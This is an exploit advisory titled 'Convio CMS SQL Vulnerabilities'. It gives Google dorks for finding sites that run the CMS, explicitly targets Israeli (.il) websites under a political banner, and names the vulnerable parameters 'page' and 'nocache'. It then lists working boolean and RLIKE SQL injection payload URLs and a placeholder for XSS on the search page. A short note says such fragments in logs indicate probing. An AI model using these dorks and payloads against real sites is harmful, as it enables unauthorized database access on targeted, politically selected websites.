###########################################################################################
# #
# Exploit Title : Convio CMS SQL Vulnerabilities #
# #
# Author : E1.Coders #
# #
# Contact : E1.Coders [at] Mail [dot] RU #
# #
# Portal Link : www.convio.com (http://convio.com/) #
# #
# Security Risk : H #
# #
# Description : All target's IL websites #
# #
# DorK : "site:.com /about/news/index.jsp?page=2" #
# DorK : "site:.il /about/news/index.jsp?page=2" #
# #
###########################################################################################
# #
# Free Free Palestine #
# Israel is committing infanticide and a holocaust in Palestine and Gaza #
###########################################################################################
#Details :
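#The vulnerable files are "index.jsp" and "session-status.jsp".
#In the examples below the injected parameters are "page" (index.jsp) and "nocache" (session-status.jsp): their values appear to reach a SQL query without being bound as query parameters.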
#Expl0iTs :
#https://www.TARGET.com/about/news/index.jsp?page=2{sql inject code}
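#Dem0 :
#https://www.TARGET.com/about/news/index.jsp?page=2 RLIKE (case when 7273121=7273121 then 0x74657374696E70757476616C7565 else 0x28 end)
#Note: 0x74657374696E70757476616C7565 is the ASCII string "testinputvalue" and 0x28 is "(". The request only tests whether the condition is evaluated by the database, so RLIKE/case-when fragments like this in the query string of request logs indicate injection probing.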
#Dem0 :
#https://www.TARGET.com/system/auth/session-status.jsp?nocache=99999999/**/oR/**/5563379=5563379--
#Dem0 :
#https://www.TARGET.com/system/auth/session-status.jsp?nocache=1715702042268%27/**/RLIKE/**/(case/**/when/**//**/4007635=4007635/**/then/**/0x74657374696E70757476616C7565/**/else/**/0x28/**/end)/**/and/**/'%'='
#XSS : https://www.TARGET.com/search/?q=<XSS SCRIPT BYPASS>